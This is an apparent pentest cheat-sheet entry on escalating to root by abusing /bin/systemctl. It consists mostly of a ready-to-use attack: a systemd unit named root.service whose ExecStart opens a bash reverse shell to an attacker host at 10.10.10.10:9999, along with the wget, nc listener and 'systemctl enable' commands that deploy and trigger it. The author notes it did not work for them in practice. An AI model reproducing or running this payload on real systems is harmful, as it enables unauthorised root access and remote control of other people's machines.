/bin/systemctl
Tried this one in practice but could not get a revshell
#Craft a payload and serve in /tmp (kali:10.10.10.10) , call it root.service
[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'
[Install]
WantedBy=multi-user.target
#wget the file into any writable directory on target
#Setup a listener on kali, port quad9
nc -nvlp 9999
#Trigger reverse shell with :
/bin/systemctl enable /tmp/root.service
Last updated